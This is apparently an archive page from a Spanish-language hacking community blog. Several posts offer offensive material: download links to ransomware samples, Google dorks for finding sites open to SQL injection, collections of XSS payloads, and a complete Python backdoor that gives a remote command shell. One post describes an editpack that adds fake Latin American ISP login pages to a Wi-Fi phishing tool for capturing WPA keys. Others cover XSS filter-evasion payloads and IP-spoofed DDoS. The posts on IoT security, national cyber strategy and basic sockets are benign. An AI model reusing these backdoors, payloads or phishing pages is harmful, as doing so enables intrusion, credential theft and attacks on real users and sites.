Category Archive HPSI

ByDrok3r

Todos los Ransomware para descargar…

Lista de descarga de todas las variantes de RANSOMWARE

 

En el siguiente link, de GoogleDrive, podrán encontrar encontrar un archivo, con las muestras de Ransomware, para descargar, acompañadas de su información respectiva.

 

La informacion que pueden enontrar de cada Ransomware es:

  • Nombre
  • Extensión
  • Patrón de extensión
  • Nombres de archivos, de nota de rescate
  • Algoritmo de cifrado
  • Descifrador
  • Capturas de pantalla

En la parte superior, tendremos mas secciones, como lo son:

  • No identificado
  • Deteccion
  • Prevencion
  • Infografia
  • Descarga
  • Fuentes y Contribuyentes

Este archivo se actualiza cada 5 minutos, por lo cual estaremos al tanto de cada ransomware.

 

Link: [ RANSOMWARE ]

Te recomiendo leer: [ Verifica si tu sistema es vulnerable al exploit (EternalBlue) del Ransomware WannaCry ]

Te recomiendo leer: [ El ransomware Koolova descifra gratis los ficheros a cambio de leer artículos ]

Te recomiendo leer: [ Google Dorks SQL Injection & XSS Payload | Encontrar vulnerabilidades en aplicaciones web ]

ByDrok3r

Google Dorks SQL Injection & XSS Payload | Encontrar vulnerabilidades en aplicaciones web

En este post, les comparto una recopilación de más de 100 dorks, para encontrar paginas vulnerables ya sea a SQL INJECTION ó XSS. En cuanto a dar con las vulnerabilidades XSS de igual manera comparto, una lista, la cual es un recopilatorio de más de 100 payloads, que podemos utilizar para dar con sitios vulnerables a XSS.

Google Dorks – SQL INJECTION

Puedes utilizar los GoogleDorks con el fin de encontrar paginas vulnerables a SQL INJECTION.
Descargar archivo .txt: [ SQL INJECTION – GoogleDorks.txt ]
Te recomiendo leer: [ Google Hacking ]

XSS Payloads

Esta lista de payloads, nos puede ayudar a encontrar paginas vulnerables a XSS, donde podremos hacer mas que un simple alert, en JavaScript. Podemos usar herramientas de fuerza fruta, que nos ayuden a encontrar dicha vulnerabilidad en una pagina web.
Puedes usar la herramienta BruteXSS, la cual te permite encontrar vulnerabilidades XSS por medio de fuerza bruta a una aplicacion web.

Sitio web con una vulnerabilidad de XSS almacenada

PasteBin: [ XSS Payloads ]
Descargar archivo .txt: [ Cross Site Scripting_Payloads.txt ]
Te recomiendo leer: [ Cross Site Scripting – (XSS) ]
Te recomiendo leer: [ BURLAR FILTROS | XSS ]
Descarga BruteXSS: [ BruteXSS ]
BySin Rostro

Creando un backdoor en python

Vamos a crear un backdoor en python😈😈😈😈😈😈😈😈😈, para que nos ayude en nuestras pruebas de pentest, nos servira cuando no podamos hacer uso de otros metodos de backdoring.

 

Este backdoor es de Conexion Directa. Trate de dejarlo lo mas comentado posible Saludos Hackers.

import sys, os
import socket
import getopt
import threading
import subprocess

# Definimos algunas variables globales
listen             = False
command            = False
target             = ""
port               = 0

# Vamos a definir una funcion que nos provea 
# de ayuda
def usage():
    print "\n\tTroyano de Conexion Directa"
    print 
    print "Uso: backdoor.py -t target_host -p port"
    print "-l --listen                       escuchar en [host]:[port]"
    print "-s --shell                      inicializa una shell"
    print
    print
    print "Ejemplos: "
    print "python backdoor.py -t 192.168.1.1 -p 5555 -l -s"
    print "\tPara dejar en escucha una shell"
    print "python backdoor.py -t 192.168.1.1 -p 5555"
    print "\tPara conectarse a una shell"
    print "\nSimple Backdoor de Conexion Directa para los"
    print "Miembros de la Comunidad de Hacking Publico & Sistemas Informaticos"
    print "el Creador de este codigo o cualquier Miembro de Hacking Publico"
    print "NO se hacen responsables por el uso que le puedan dar a este codigo,"
    print "el cual esta hecho con fines Educativos."
    sys.exit(0)

# Funcion que se encargara de el cliente
# osea la computadora que se conecta al 
# backdoor 
def client_sender():
    # Creamos el socket
    cliente = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    
    try:
        # Hacemos la conexion al servidor/backdoor
        cliente.connect((target, port))
        # Aqui solo te pregunto tu nickname
        nickname = raw_input("Cual es tu nickname ? ")
        # Lo concateno (Tu nick) con otra cadena
        nickname += "@hacker ~:#"
        # Envio un whoami (Para que sepamos que 
        # usuario somos en el equipo comprometido)
        cliente.send("whoami")
        # Recibimos el usuario
        usuario = cliente.recv(1024)
        # Y lo imprimimos
        print "Eres el usuario: \t%s" % usuario
        
        while True:
            # Esperamos por mas input           
            buff = raw_input("%s " % nickname)
            
            # Enviamos comando
            cliente.send(buff)
            # El data es la respuesta del comando 
            # que Enviamos
            data      = cliente.recv(1024)

            print data
            
            # Si el comando es "exit"
            # nos desconectamos del servidor/backdoor
            # si es limpiar pantalla 
            # la limpiamos 
            try:
                if "exit" in buff:
                    cliente.send("exit")
                    cliente.close()
                    print "Bye, Bye!!!"
                    break     
                if "cls" or "clear" in buff:
                    if os.name('nt'):
                        os.system("cls")
                    else:
                        os.system("clear")
            except:
                continue
                        
    except:
        # Si hubo un error se produce una Excepcion
        # y salimos del script
        print "[*] Excepcion! Saliendo!!!"
        cliente.close()
        
def server_loop():
    global target
    
    # Si no indicamos la opcion -t
    # el server toma esta direccion
    if not len(target):
        target = "0.0.0.0"
    
    # Creamos el socket para las conexiones 
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.bind((target, port))
    server.listen(5)
    
    # Creamos un hilo por cada cliente que se conecte
    try:
        while True:
            client_socket, addr = server.accept()
            
            client_thread = threading.Thread(target=client_handler,
                                             args=(client_socket,))
            print "[*] Nuevo cliente conectado %s" % socket.gethostname()
            client_thread.start()
            
    except KeyboardInterrupt:
        print "Se ha detenido el server"
        sys.exit(1)        
        
        
def run_command(command):

    command = command.rstrip()

    
    try:
        output = subprocess.check_output(command, stderr=subprocess.STDOUT, 
                                         shell=True)
    except:
        output = "Fallo al ejecutar el comando.\r\n"
 
    return output

def client_handler(client_socket):
    global command
     
    if command:
        while True:
            

            cmd_buff = client_socket.recv(1024)

            if "exit" in cmd_buff:
                print "El cliente %s se DESCONECTO." % socket.gethostname()
                client_socket.close()
                break                    
            
            response = run_command(cmd_buff)
            
            client_socket.send(response)
            
def main():
    global listen
    global port
    global command
    global target
    
    # aqui verificamos que el usuario haya
    # dado opciones, si no, imprime el modo
    # de uso (funcion usage() )
    if not len(sys.argv[1:]):
        usage()
    
    # Si el usuario dio opciones las leemos 
    # para verificar que sean validas, despues 
    # ejecutar lo correspondiente
    try:
        opts, args = getopt.getopt(sys.argv[1:], "hlt:p:s", ["help", "listen", "target",
                                                             "port", "shell"])
    except getopt.GetoptError as err:
        print str(err)
        usage()
    
    for o,a in opts:
        if o in ("-h", "--help"):
            usage()
        elif o in ("-l", "--listen"):
            listen = True
        elif o in ("-s", "--shell"):
            command = True
        elif o in ("-t", "--target"):
            target = a
        elif o in ("-p", "--port"):
            port = int(a)     
        else:
            assert False, "Opcion no valida"
            
    if not listen and len(target) and port > 0:
        client_sender()
    if listen:
        server_loop()

main()

 

ByMoritz

Editpack para Fluxion | Operadores Latinos Vr 0.2

FLUXION es una herramienta para auditorias inalambricas muy conocida e integrada a distribuciones como Wifislax y otras, esta funciona similar a la famosa y muy conocida LINSET.

Su función es, capturar un handshake de la red victima, desautenticar los clientes de la misma por medio de una denegación de servicio en la conexión entre ellos y el AP. Generando paralelamente un SSID o señal AP Fake (Falsa), para obligar a la victima a conectarse a la red fake y entregar por ingeniería social la clave WPA de su red Wifi.

Ya explicado esto,  el Editpack contiene mas interfaces de operadores de servicio ISP latinos por lo que la herramienta al inicio fue enfocada para Europa y EEUU, por lo que decidí agregar estos para ser usado en nuestra zona de influencia, espero les sea util y si desean apoyar lo pueden donando por Paypal.

Contenido de esta primera edición

Se agregaron las siguientes interfaces de:

  • DIRECTV
  • CLARO
  • TELMEX
  • UNE-TIGO
  • INFINITUM
  • MOVISTAR
  • METROTEL

  

En las siguientes ediciones del EditPack se agregaran operadores de MEXICO, ARGENTINA, ECUADOR, PERU.

=======================
Instalación del Editkpack
=======================

 

Aqui LINK de Descarga:

================
EditPACK Vr. 0.1
================

================
EditPACK Vr. 0.2
================

Esta versión contiene correcciones en el código que tuvo la Vr. 0.1

===============================
Usa Flu[X]ion como un Profesional
===============================

=================
DONACIONES
=================

Síguenos en nuestras redes sociales

BySin Rostro

Reglas del juego

Hola Amigos como sabran se ha preparado un reto en el grupo de hacking público HPSI. La intención de este es aprender y divertirnos un poco.

Debido a que este se anunció hace una semana solo los usuarios que quisieron unirse a este reto podrán resolverlo.

A continuación detallo las reglas e instrucciones para resolverlo.

Reglas

  1. Está estrictamente prohibido hacer DoS o DDoS a la infraestructura

  2. Recuerda que estaras siendo vigilado todo el tiempo 😉😉😉

  3. Trata de no dañar los escenarios ya que no seras el unico que quiere usarlas

  4. Diviértete

Instrucciones

  1. Consigue todas las flags

  2. Se te pedira tu IP ya que solo podras accesar a la plataforma atraves de ella

  3. Se avisara por mensaje a los participantes cuando es su turno cada uno tiene 2 horas para completar le reto

  4. Hackea!!!!

  5. DIVIÉRTETE

ByDrok3r

CROSS SITE SCRIPTING (XSS) – PRUEBAS DE VULNERABILIDAD

XSS

 

Antes de comenzar a leer este post te recomiendo leer: Cross Site Scripting – Introducción

 

Una vez localizada la sección en la página web la cual pueda recibir texto por parte del usuario y que este lo pueda mostrar como resultado, pasaremos a realizar pruebas para de esta manera determinar si esta sección es vulnerable al XSS.

Este sitio web es completamente vulnerable a multitud de ataques web, el cual usaremos para explicar esta sección. También usaremos el Mantra de OWASP.

En el caso de este sitio encontramos el apartado para hacer búsquedas. Como podemos ver de resultado nos devuelve nuestra entrada y aparte nos la muestra en la url “search.aspx?txtSearch=drok3r” en esta sección es donde comprobaremos si la pagina es vulnerable a XSS

Para esto ingresamos el siguiente código:

<script>alert("Hacked!!!")</script>

Este código lo que hace es mostrar una alerta en la página web la cual contenga el texto dentro de las casillas. Algunos pentesters o atacantes suelen llamarlos “payload”

Como podemos ver, la pagina es vulnerable a XSS

Sin embargo el código anterior puede que no funcione en la mayoría de los casos debido a ciertos filtros de seguridad Anti-XSS los cuales rechazan o imposibilitan el uso de ciertos caracteres o de palabras en concreto. La mayoría de estos filtros, bloquean caracteres como <>, “”, (), ; , /.

Por otro lado algunos bloquean las etiquetas de forma completa <script> esto dificulta en gran medida verificar si la pagina es vulnerable a XSS por lo que pasaríamos a comprometer su seguridad y brincarnos su filtro Anti XSS.

QUE SE PUEDE HACER AL DETECTAR UNA VULNERABILIDAD XSS

Como siempre se ha dicho, las posibilidades dependerán de la imaginación del atacante, en el post anterior se hizo mención de que es lo se podría realizar con un ataque de XSS de una manera muy general. Sin embargo lo que se puede hacer es:

  • Infectar el navegador de un usuario
  • Phishing
  • Realizar X acción en la página web
  • Modificar o crear perfiles en la aplicación web ya sean de usuarios comunes o administradores
  • Defacement
  • Ataques DDoS
  • Utilización de Gusano XSS

Sin embargo las posibilidades dependerán en su gran mayoría dependerán de las funciones que ofrezca el sitio vulnerable.

MÉTODOS PARA EXPLOTAR XSS

Existen distintos métodos o tecnias para explotar un XSS, su nombre dependerá de las zonas de código de la aplicación web donde quedara nuestro código JavaScript malicioso.

1.- El código se copia entre dos etiquetas HTML.

Este es el método mas snecillo, pues solo debemos de inyectar el código.

[PAYLOAD]: <script>alert(“HACKED”)</script>

2.- Código dentro de una etiqueta “value” de una etiqueta <input>

Este es el ejemplo mencionado con anterioridad, en donde la inyección se realiza en el buscador de la aplicación web

 [PAYLOAD]: /><script>alert(‘hacked’)</script>

HTML: <input type=”text” name=”search” value=”[PAYLOAD]”

<input type=”text” name=”search” value=”/>

<script>alert(‘hacked’)</script>

Como podemos ver, nuestro payload quedo dentro de “” por lo que esto nos puede generar ciertos problemas, por lo cual podemos cerrar la etiqueta anteponiendo “/> o remplazando las comillas dobles de nuestro payload por unas comillas simples: <script>alert(‘hacked’)</script>

Recomiendo probar ambas.

Por lo cual nos quedaría como resultado:

<input type=”text” name=”search” value=””/>
<script>alert(“hacked”)</script>;<div class=””>

3.- Código dentro de un comentario en HTML

En este caso, buscamos mensajes de depuracion en el codigo HTML, algunas desarroladores tienen la mala costumbre de dejar algo como esto:

<!-- Se realizo la busqueda "[search]" -->

[search] es la cadena de texto buscada, en donde podemos introducir nuestro codigo malicioso, en donde deberemos de cerrar los caracteres del comentario, nos quedaria algo como lo siguiente:

--><script>alert("hacked")</script><!--

El resultado final seria:

<!-- Se realizo la busqueda "--><script>alert("hacked")</script><!---" --->

4.- Código dentro de código

Algo muy comun cuando las paginas utilizan las entradas de los usuarios para generar algun tipo de evento, por medio de JavaScript o el simple hecho de almacenar la informacion. algo como:

<script>var search="[busqueda]"</script>

 

En este ejemplo no es necesario incluir las etiquetas <script>, pues podemos directamente poner el codigo. No poner las etiquetas nos puede ayudar a evadir los filtros Anti-XSS.

";alert"("Hacked")//

Las diagonales al final nos ayudan a comentar el resto de la linea del JavaScript original para que este no interfiera con el codigo.

Resultado final

<script> var search="[busqueda]"="";alert("Hacked");//";</script>

 

 

EXTRA

También podemos realizar pruebas de inyección de código HTML, de igual manera que en el XSS solo que en lugar de mandar condigo en JavaScript mándalos código en HTML. Por ejemplo si nuestra aplicación web a auditar nos permite realizar búsquedas dentro de ella misma, si en el resultado incluye o muestra nuestra búsqueda “Resultados de <TEXTO>“.

Ejemplo:

Si buscamos “hola” en www.ejemploHTML.com  nos devolverá lo siguiente:

Resultados de la búsqueda hola

Y en la url tenemos:

https://ejemplo.HTML.com/Search.php?q=hola

Podemos ver que en la url nos muestra nuestra búsqueda o el texto que ingresamos para ser buscado…

Lo podemos hacer para comprobar que esta pagina es vulnerable a inyección de código HTML solo debemos incluir en nustra busqueda etiquetas HTML.

Por ejemplo en lugar de buscar “hola” buscaremos “<b>hola</hola>” en html las etiquetas <b> o <strong> hacen que el texto que contengan se muestre en negritas, por lo que cuando hagamos esta busqueda nos debería devolver el siguiente resultado:

Resultados de la búsqueda hola

Y en la url tenemos:

https://ejemplo.HTML.com/Search.php?q=hola

Si en la parte de la pagina nos muestra el texto introducido en negrita, quiere decir que la pagina es vulnerable a inyecciones de código HTML. Muy similar al XSS.

En el video anterior muestro una vulnerabilidad de XSS e inyeccion de codigo HTML

 

 

Pagina Vulnerable:

[ http://demo.testfire.net/default.aspx ]

Byaci

IoT Vs Seguridad

Desde el año 2000 el término IoT (Internet de las cosas) fue mencionado en The Guardian, Scientific American y The Boston Globe, pero hasta el año 2005 la Unión Internacional de Telecomunicaciones (UIT) publico el primer estudio sobre el tema. Hasta 2011, se comenzó a trabajar en el estándar IoT – GSI Global Standards y concluyo hasta junio de 2015. El IoT-GSI tiene por objeto promover un enfoque unificado en el UIT-T para el desarrollo de normas y técnicas (Recomendaciones) que permitan el Internet de las cosas a escala mundial.

IoT es una tecnología que va creciendo a pasos gigantes, para el año 2020 se estima que 50 mil millones de dispositivos estén conectados, es decir, 6 dispositivos por cada persona.

Pero, ¿Se ha considerado la seguridad para estos dispositivos?; La Comisión de Estudios 17 (SG17) del UIT-T coordina la labor relacionada con la seguridad. La SG17 actualmente trabaja en la seguridad de aplicaciones y servicios para Internet de las cosas (IoT).

Por otro lado, la Iniciativa Mundial de Normalización de la UIT sobre Internet de las cosas (IoT-GSI), se basa en la labor de ciertos ámbitos como: los aspectos de los sistemas de identificación de la red (NID), las redes de sensores ubicuos (USN), las comunicaciones orientadas a las máquinas (MOC), la web de las cosas (WoT). La iniciativa IoT-GSI tiene como objetivo:

  • Crear una plataforma de trabajo común agrupando los grupos de la UIT que realizan trabajos sobre IoT.
  • Elaborar una definición y descripción general de la IoT y preparar un plan de trabajo que servirá para establecer un programa de normalización de la IoT a escala mundial.
  • Elaborar las normas detalladas necesarias para la implantación de la IoT.

A pesar de que se trabaja para crear estándares y normas sobre el uso y seguridad de IoT, siendo una tecnología en crecimiento y recién adopción por empresas y usuarios de casa, estamos más susceptibles a ciberataques, desafortunadamente IoT afecta al mundo de una manera directa y física, ya que esta tecnología se usa desde coches, electrodomésticos, aviones, wearables (uso diario); por lo que se convierten en riesgos reales para una persona. Internet de las cosas puede ser percibida como una concepción de repercusiones tecnológicas y sociales.

“Una nueva dimensión se ha agregado al mundo de las tecnologías de información y la comunicación (TIC): a cualquier hora, en cualquier lugar, ahora vamos a tener conectividad para cualquier cosa. Las conexiones se multiplican y crearán una nueva red dinámica de redes con redes, una Internet de las Cosas”, UIT.

Desde nuestra perspectiva se deben considerar varios aspectos para minimizar los riesgos de un posible ciberataque a un dispositivo con tecnología IoT. Estos aspectos pueden abarcar desde la seguridad lógica y física, para la parte lógica se recomienda poner atención en el uso de software, control de usuarios y accesos a los datos, dentro de la parte física se debe considerar la gestión de identidad sobre todo en un ambiente de IoT, donde pueden existir muchos puntos de entrada. Se puede considerar una segmentación en la red para aislar todos estos dispositivos. Contar con servicios profesionales que ayuden con asesorías para afrontar los retos de seguridad, con estrategias alineadas al negocio, procesos y políticas.

 

Referencias:

http://www.itu.int

http://www.itu.int/en/ITU-T/gsi/iot/Documents/tor-iot-gsi.pdf

Byaruzat

IP Spoofing y su potencial.

Buenos días, tardes o noches a todos, en esta ocasión vengo a hablar sobre un tema que ya llevo tratando vario tiempo y es interesante contarlo y compartirlo con la comunidad.

 

¿Qué es spoofing?

Spoofing, mayormente conocido como suplantación es una técnica por la cual el atacante se hace pasar por una entidad distinta a través de la falsificación de los datos en una comunicación.
En simple palabras suplanta su identidad en comunicaciones, como las DNS, IP´s, email´s, etc…

 

¿Qué es el IP spoofing?

El IP spoofing es un método de suplantación de IP, se utiliza para realizar ataques DDoS, ya que si lo intentamos utilizar como proxy nunca sería efectivo ya que la respuesta del servidor ante las peticiones irían al destino de la IP suplantada y no al nuestro. Es por esto que se utiliza para los ataques de denegación de servicio.

 

¿Por qué es tan efectivo?

El ataque es muy efectivo debido a la complicación que es detenerlo.

 

Ejemplo de ataque SIN spoofing IP:

 

192.168.0.102 (atacante)  ——————————————–(paquetes)—————————————-> 192.168.0.101 (victima)

 

En este caso la victima (192.168.0.101) solo tiene que bloquear el trafico de la IP atacante (192.168.0.102) y no responder al ataque DDoS, de esta forma se mitigaría un ataque normalmente.

 

Ejemplo de ataque CON spoofing IP:

 

 

192.168.0.102 (atacante)   ——(192.168.0.104 —192.168.0.103—192.168.0.105)—————(paquetes)—————————————–>192.168.0.101 (victima)

 

En este otro caso, la victima (192.168.0.101) estaría recibiendo un ataque de 3 IP´s diferentes, pero… ¿qué pasa si son 500 IP´s diferentes?, en ese caso la victima tendría un gran problema al intentar mitigar el ataque. Esto también se puede dar en caso donde el atacante recaude IP´s de los usuarios de la pagina/servidor para atacar con esas IP´s y así bloquear a los usuarios.

 

 

 

 

 

IMPORTANTE: 

Los ISP bloquean los ataques de Spoofing IP, es posible que si intentas enviar un ataque spoofeado a una página o persona, tu ISP lo bloquee, es por eso que estos ataques son ilegales y están prohibidos en muchos países. Solo algunos VPS tienen la capacidad de realizar estos ataques pero son muy escasos, de igual forma no se recomienda hacerlos.

 

 

Byaci

Estrategia Nacional de Ciberseguridad (México)

…”Hacia una Estrategia Nacional de Ciberseguridad” (México) plan estratégico impulsado por el Gobierno de la República Mexicana, donde colaboran diferentes sectores como: gobierno, sector privado, comunidad técnica, sociedad civil y académica.

El documento hace mención que para el año 2030 México será un país mejor preparado ante ciberataques y con una mejor cultura en ciberseguridad.

La Estrategia contemplara 4 Objetivos Estratégicos y 8 Ejes Trasversales:

Economía: Debido a el gran crecimiento y la continua evolución de las TIC, se requiere la implementación de proyectos relacionados con el desarrollo y la innovación de las tecnologías. con el fin de crear una cultura de prevención e impulsar al país como una de las economías emergentes más proliferas:

  • Concientizar de los actos de riesgo aosciados en el ciberespacio.
  • Desarrollo de proyectos de investigación e innovación, fomentando el capital humano especializado en materia de ciberseguridad.
  • Mitigación de riesgos y amenazas que puedan afectar la economía y la estabilidad del país.
  • Generación de tecnología propia.
  • Desarrollo de buenas prácticas, normas y estándares conforma a las necesidades del país y en distintos sectores.
  • Mecanismos, marco jurídico y normas técnicas para el crecimiento económico del país a través de la innovación tecnológica, manteniendo la protección las Infraestructuras Críticas de la Información.
  • Regular las operaciones que se realizan a través de Internet.
  • Métricas sobre el uso y confianza de servicios de comercio electrónico.

Sociedad: La estrategia tiene como factor primordial al factor humano y a cuidar sus derechos, es por ello, que la estrategia se enfoca en fortalecer la confianza de los usuarios que utilizan servicios en línea, así mismo la concientización de adoptar medidas de ciberseguridad y promover el manejo adecuado y seguro de las TIC.

  • Campañas que contemplen la autoprotección, autoregulación y mejores practicas.
  • Protección de adolescentes, niños y niñas a la exposición con depredadores informáticos.
  • Estimular la profesionalización de la ciberseguridad.
  • Prevención y combate de incidentes con la participación ciudadana.
  • Construir un ciberespacio seguro y confiable.
  • Lineamientos que coadyuden al bienestar de la población.
  • Procedimientos y mecanismos para la protección de las Infraestructuras Criticas de la Información e Inteligencia Especializada.
  • Un marco jurídico que contemple el enfoque de los derechos humanos, de caracter preventivo.
  • Indicadores de medición de efectividad de las campañas de concienciación y cambio cultural, así como de los incidentes de ciberseguridad.

Gobierno: La gestión pública a través de las TIC contiene gran variedad de datos e información sensible, tanto de los entes públicos, como de la población, por lo que:

  • Se requiere crear campañas para mejorar el nivel del servicio público.
  • Políticas y programas de actualización tecnológica.
  • Fortalecer la ciberseguridad en la gestión de la información relativa a la prestación de trámites y servicios a la población.
  • Prestación más eficiente, segura y confiable de los trámites y servicios para la población.
  • Criterios y controles para estandarizar los procesos de seguridad de la información y el tratamiento de datos de los entes públicos.
  • Instauración de canales de comunicación seguros ante posibles ataques.
  • Brindar certeza jurídica en la prestación de trámites y servicios a la población.
  • Proceso gradual de adopción voluntaria de los procesos referidos en el Manual Administrativo de Aplicación General en materia de Tecnologías de la Información y Comunicaciones y de Seguridad de la Información (MAAGTICSI).

Seguridad Nacional: El incremento de las amenazas globales y los delitos a nivel mundial, conllevan a fortalecer la Seguridad Nacional para preservar la integridad, estabilidad y permanencia del Estado Mexicano.

  • Campañas dedicadas a las Instancias de Seguridad Nacional, manejo de información general, personal y laboral.
  • Contar con una base de conocimientos centralizada.
  • Mecanismos de colaboración y cooperación entre dependencias vinculadas con la Seguridad Nacional para el intercambio de información e inteligencia.
  • Desarrollo tecnológico, investigación e intercambio de conocimiento a fin de fortalecer la ciberseguridad en las dependencias que cuenten con Infraestructura Crítica de la Información del Estado Mexicano.
  • Estandarización del proceso de seguridad de la información y el tratamiento de activos de información en las Instancias de Seguridad Nacional.
  • Protocolos de comunicación y cooperación entre los sectores involucrados para la ciberdefensa en situaciones de un ciberataque que afecte las Infraestructuras Críticas de la Información o Información e Inteligencia Especializada, con una posible afectación al orden y paz social.
  • Armonización de la legislación en relación a delitos en relación a delitos como ciberterrorismo, delitos que usan TIC para su comisión (ciberdelitos), ciberataques y ciberamenazas, el cual debe contemplar la investigación y sanción correspondiente.
  • Estadísticas globales para conocer las tendencias de los incidentes cibernéticos.

La ENCS ( Estrategia Nacional de Ciberseguridad) se presentara durante la Semana Nacional de Ciberseguridad del 9 al 13 de octubre de 2017.

Si deseas conocer a detalle el documento de la ENCS, puedes consultar el siguiente enlace:

https://www.gob.mx/cms/uploads/attachment/file/239446/Documento_de_trabajo_ENCS_v0.pdf

 

Byaruzat

(parte 1) Sockets con Python.

Hola, ya llevo un tiempo de inactividad dentro de la página, pero vuelvo con mas ganas y con mas aprendizajes. En este caso vamos a hablar de los “sockets con python” una rama muy interesante y de verdad, muy divertida de python, pero primero…

¿Qué son los sockets?

Los sockets de Internet constituyen el mecanismo para la entrega de paquetes de datos provenientes de la tarjeta de red a los procesos o hilos apropiados. Un socket queda definido por un par de direcciones IP local y remota, un protocolo de transporte y un par de números de puerto local y remoto.

Entonces se podría decir que un socket es un paquete en español, algo que tiene un destino, un inicio, el puerto por donde va a ir y el protocolo.

Empezando con la programación:

 

CLIENTE

 

  • Primeramente vamos a importar la libreria “socket”.
import socket

 

 

  • Despues vamos a definir un socket de flujo, para concordar nuestra conexión con envio de datos TCP ( “s” es la variable de la conexión,  AF_INET es la conexión a internet y SOCK_STREAM define el uso de protocolo TCP)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

 

 

  • Luego utilizamos la variable “s” y le asignamos una IP y un PUERTO, esto hara que el cliente busque el servidor y haga la conexión exitosa.
s.connect(("192.168.0.101", 7777))

 

 

  • Seguidamente vamos a crear un “While” el cual va a capturar un mensaje a través de un raw_input y va a mandarlo hacía el servidor definido. (“s.send(mensaje)” va a mandar la variable mensaje al servidor definido anteriormente).
while True:
    mensaje = raw_input("Escribe un mensaje: ")
 
    s.send(mensaje)
 
    if mensaje == "cerrar":
        break

 

 

  • Finalmente luego del break se cerrara la conexión, dando por terminada la misma.
s.close()

 

SERVIDOR

 

  • Para hacer más rápido el proceso, el servidor voy a comentar todo sobre las lineas de codigo, es practicamente lo mismo, nada más que va a recibir la información en vez de enviarla.
import socket
 
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 
s.bind(("", 7777)) #Va a escuchar conexiones del puerto 7777 y de cualquier IP.
 
s.listen(5) #Se pone en modo de escucha a las conexiones entrantes y las limita a 5.

sc, addr = s.accept() #Instanciamos un objeto sc (socket cliente) para recibir datos, al recibir datos este devolvera tambien un objeto que representa una tupla con los datos de conexion: IP y puerto
 
while True:
 
    recibido = sc.recv(1024)
 
    if recibido == "cerrar":
        break
 
    print str(addr[0]) + " dice: ", recibido
 
sc.close()
s.close()

 

Aclaración:

Tanto el SERVIDOR como el CLIENTE, deben ir separados y ambos guardador con extención “.py”.

 

Bien, esta es la parte 1 de sockets con python, en la parte 2 vamos a ver como aplicar esto mismo con threads para aceptar varias conexiones y hacer un chat dinamico, mucha suerte!